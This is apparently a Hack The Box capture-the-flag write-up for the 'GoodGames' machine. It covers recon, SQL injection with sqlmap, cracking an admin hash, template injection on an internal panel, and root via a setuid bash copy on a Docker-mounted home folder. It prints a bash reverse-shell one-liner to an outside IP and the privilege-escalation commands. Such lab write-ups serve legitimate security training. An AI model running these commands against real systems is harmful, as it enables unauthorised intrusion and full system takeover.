HTB [GoodGames]

Recon

port scan

PORT   STATE SERVICE REASON  VERSION
80/tcp open  http    syn-ack Apache httpd 2.4.51
| http-methods:
|_  Supported Methods: OPTIONS HEAD GET POST
|_http-server-header: Werkzeug/2.0.2 Python/3.9.2
|_http-favicon: Unknown favicon MD5: 61352127DC66484D3736CACCF50E7BEB
|_http-title: GoodGames | Community and Store
Service Info: Host: goodgames.htb

• Only a single port opened o.O
• Ok let’s enum the website and scan for UDP ports in the background
• Add goodgames.htb to your /etc/hosts file

web enum

• It’s a flask application

• There’s a signup page, let’s create a new account and login

• My name and email are reflecting here, so let’s try for a SSTI

• There’s no SSTI in username & email field

Forget password

• It works normally

SQLi

• SSTI not worked here, so let’s try for SQL Injection

sqlmap -u "http://goodgames.htb/login" --method=POST --data "email=a&password=a"

• Cool let’s dump the db

available databases [2]:
[*] information_schema
[*] main

• Let’s use the main database

[3 tables]
+---------------+
| user          |
| blog          |
| blog_comments |
+---------------+

• user seems interesting

[4 columns]
+----------+--------------+
| Column   | Type         |
+----------+--------------+
| email    | varchar(255) |
| id       | int          |
| name     | varchar(255) |
| password | varchar(255) |
+----------+--------------+

• Dump all these things

• only the first one is in the box, other 5 accounts are mine, used to check ssti
• let’s crack the hash 2b22337f218b2d82dfc3b6f77e7cb8ec

• login with these creds admingoodgames.htb:superadministrator

• There’s a settings button in the profile page, it’s not available for normal users
• And clicking that redirects us to http://internal-administration.goodgames.htb/
• Let’s add this to our /etc/hosts file

Shell

Internal-Administration

• Let’s use the password that we got from the sqli, admin:superadministrator

• Successfully logged in

• In settings pannel we can able to do a SSTI

• Now let’s try to get a rev shell
• The output says uid = 0 (root) so most likely it’s a docker container
• Start a python server and serve a file named shell.sh

bash -c 'exec bash -i &>/dev/tcp/10.10.14.3/1337 <&1' 

• As I said earlier, we got shell as a docker container
• There’s a user named augustus, you can grab the user.txt file from his home folder

Privesc

• .2 is the docker IP, and .1 is always the host and it’s the machine IP
• I’m going to upload a static nmap binary to scan all the internal ports of that IP
• Here is the link to download that binary

• Looks like firewall blocking us to access ssh, but we can access it from the docker

• It’s a guess that both machines have the same user called augustus, using the same password allows us to ssh into the host machine
• Enumerating the machine gives us nothing
• I’ve checked for all services, nothing seems interesting
• But it’s wiered that we got the users home directory in the docker container
• Seems the file system is mounted with it
• Logout us augustus and go back to the docker container
• Create a id_rsa file using ssh-keygen command
• But that method failed, coz the root folder is for docker it’s not mounted (See #beyond root part for more understanding)
• So let’s copy the bash binary to our agustus home folder and give u+s (setuid) permissions for that

cp /bin/bash .

• Do this us augustus
• Then go back to the docker container

chown root:root /home/augustus/bash
chmod u+s /home/augustus/bash

• Do this as root user in docker container

• Now ./bash -p for the root
• Really It’s a good game as the name of the machine

Beyond root

• Let’s go back to the docker container and chek for the mounted folders, run the command mount

• Looks like the home folder of the augustus is mounted to the docker container
• That’s why we can able to change the permissions of the bash binary that has been copied to augustus’ home folder
• Hope you’ve liked this writeup, cya soon :)